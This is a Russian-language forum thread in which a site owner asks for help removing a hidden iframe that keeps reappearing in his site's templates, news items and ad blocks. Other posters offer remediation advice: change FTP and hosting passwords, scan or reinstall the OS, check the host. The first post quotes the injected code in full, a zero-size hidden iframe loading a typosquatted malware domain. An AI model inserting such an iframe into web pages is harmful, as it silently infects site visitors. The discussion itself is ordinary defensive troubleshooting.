Перейти к публикации

Помогите! Заколебали вирусы!


Рекомендованные сообщения

Наткнулся у сябя в индексе на левый код, который я туда не вписывал.

<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>

Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт.

Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня.

Подскажите как от этого избавиться?

Сайт - xxxrips.ru

Изменено пользователем garnir
Ссылка на сообщение
Поделиться на других сайтах

А причем здесь права на файл, взламывают ваш сайт по FTP, поэтому никакая смена прав на файл вам не поможет. Используйте поиск на форуме по слову iframe, эта тема неоднократно обсуждалась, там же и найдете пути для решения вопроса.

Ссылка на сообщение
Поделиться на других сайтах

Наткнулся у сябя в индексе на левый код, который я туда не вписывал.

<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>

Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт.

Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня.

Подскажите как от этого избавиться?

Сайт - xxxrips.ru

такая же проблема была, на днях, только код другой, но это не лавное...

проверяешь винду антивирусом (а лучше переустанавливаешь), меняешь пароли на все! в т.ч. фтп, к панели хостера и т.п.

и будет тебе счастье... :)

Ссылка на сообщение
Поделиться на других сайтах

Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт.

Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня.

Подскажите как от этого избавиться?

Сайт - xxxrips.ru

Уважаемый Виктор, почему вам не забанить этого подлеца с его порнушным сайтом и с трояном ?

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

Какой у меня сайт - это мое личное дело. Не нравится - не ходите. Речь идет о движке и вирусе, который, между прочим, достал уже всех.

Я снес винду на своем компе, поставил вместо нее Debian Linux, поменял ВСЕ пароли, ftp, админка, свой пароль входа на сайт и всеравно ничего не помогает. Этот код продолжает появляться.

Изменено пользователем garnir
Ссылка на сообщение
Поделиться на других сайтах

Вот это не надо на меня вешать. Движок я покупал. И в отличии от засранцев, которые юзают нуленые движки я имею право хоть на какую-то поддержку, хотя-бы на форуме.

PS Только дебил станет обращаться на официальный форум поддержки с пиратской версией скрипта.

Ссылка на сообщение
Поделиться на других сайтах

garnir,

Всем чем я мог, я вам помог, я объяснил вам, что не в скрипте не проблема, взламывают вас не через скрипт. У вас утекают ваши логины и пароли, причем не от скрипта, а выше, т.к. изменить через web index.php нельзя, на файл нет прав на запись. Меняют по FTP или SSH, или с панели управления хостингом. Возможно уязвимо ПО хостинга, такие случаи также были не раз.

Ссылка на сообщение
Поделиться на других сайтах

Сегодня обнаружил новую штуку. Перестал появляться айфрейм в шаблоне main и в index, но код появляется в коротких новостях, причем не во всех. Где теперь его искать - ума не приложу. Пересмотрел все шаблоны. Ничего не нашел.

!!!! Во дела! Нашел код в рекламных материалах!

Ссылка на сообщение
Поделиться на других сайтах

Блин.

1. убедись, что ОСь у тебя здоровая на компе.

2. убедись, что хостер следит за чистотой сервера.

3. скачай шароварный фтп-клиент и не крякай его (или купи лицензию).

4. поменяй пасс на фтп.

5. юзай и анализируй.

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...